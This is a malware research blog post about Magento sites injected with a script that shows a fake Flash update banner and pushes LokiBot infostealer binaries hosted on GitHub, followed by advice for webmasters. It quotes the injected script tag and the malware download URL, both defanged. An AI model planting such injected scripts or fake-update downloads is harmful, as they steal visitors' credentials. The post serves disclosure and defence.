GitHub Hosts Infostealer

  • March 15, 2018

A few months ago, we reported on how cybercriminals were using GitHub to load a variety of cryptominers on hacked websites. We have now discovered that this same approach is being used to push binary “info stealing” malware to Windows computers.

Infected Magento Sites

Recently, we identified hundreds of infected Magento sites with the following injected script:

<script type="text/javascript" src="https://bit.wo[.]tc/js/lib/js.js"></script>

The contents of the js.js file included:

Content of bit.wo[.]tc/js/lib/js.js
The contents of bit.wo[.]tc/js/lib/js.js
This code creates a hidden div and after a short delay displays a fake Flash Player update banner above the normal site content.

Fake Adobe Flash Player Update Banner
Fake Adobe Flash Player Update Banner

What differentiates this attack from others is the download URL which points to a malicious file on GitHub:
https://github[.]com/flashplayer31/flash/raw/master/flashplayer28pp_xa_install.exe

On March 13, the file had a poor detection rate of 8/66 on VirusTotal, including primarily generic signatures. When we sent it along to Jerome Segura at Malwarebytes, he recognized the file to be a variation of the LokiBot info-stealing malware.

Inspecting the GitHub Repository

The answer to the poor detection rate may be found in the GitHub repository containing the malicious file: https://github.com/flashplayer31/flash

Both the account (flashplayer31) and the repository (flash) were created on March 8th, 2018, less than a week before we detected the malicious contents.

flashplayer31

The GitHub repository contains only two files:

flashplayer28pp_xa_install.exe (described in the previous section above) and flashplayer28pp_xa_install.isoa trojan including an ISO image, with the malicious /FLASHPLA.EXE located inside.

If you check the commit history in the repository, you will find that both binary files are updated at least once a day.

The attackers are frequently repacking the binaries to minimize antivirus detection rates and then pushing the changes to Git, which is why we are mostly seeing generic and heuristic warnings on VirusTotal. The updated files are immediately available for download from the master branch on GitHub.

This entire process is easy to automate and can work without any human interaction.

GitHub as a Malware Hosting Environment

GitHub provides hackers with a few advantages over other types of hosting environments:

  • It’s free to use
  • It’s suitable for automation
  • The domain name is reputable making it unlikely to be blacklisted by any security tool

It’s possible to disable the account after complaints, however, the process can take a long time – from abuse complaint to account closure – and a new profile can be created in minutes.

Credential Stealing Malware

Let’s return to the malware itself. LokiBot is defined as an “infostealer” because it is renown for its ability to steal credentials from a variety of popular email clients and web browsers.

This malware is also able to steal login details from dozens of FTP client (e.g. FileZilla, FlashFXP, WS_FTP, etc) and SSH programs (e.g. PUTTY), making it especially dangerous for webmasters and web developers who could have credentials stolen from their sites and servers.

Between 6-10 years ago, this was the most popular vector for hacking websites. Once a webmaster’s computer was infected, the malware would simply scan for files with saved FTP credentials (the majority of FTP clients were saving them in plain text) then send the findings to the control server.

While this attack vector is not as popular these days, you still can’t underestimate it.

Mitigating the Risk of Credential Stealing Malware

My advice to webmasters hasn’t changed much since 2008 when I began my journey in website security.

To prevent the theft of your site credentials, make sure the computers and devices you maintain your site with are not infected. Install some reputable antivirus software and regularly patch/update both your operating system, as well as essential web software including web browsers, FTP clients, content management systems, etc. Of course, such updates should come from the software itself, not from an annoying banner on an unrelated third-party site.

You should also refrain from saving passwords in any programs other than your trusted password manager. Don’t let FileZilla save your FTP passwords, and do not store any website, webmail, or bank passwords in your browser.

Where possible, I highly recommend that you use private key authentication and/or two-factor authentication. Use SFTP instead of FTP – the majority of hosting providers now include this option.

And of course, after any security incident, assume all your passwords to be compromised and change them as soon as possible. Following these steps will help reduce the risk of credentials theft.

If you believe your website has been compromised or infected with malware, we can help clean up and restore your site.

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.

Related Tags
Related Categories
You May Also Like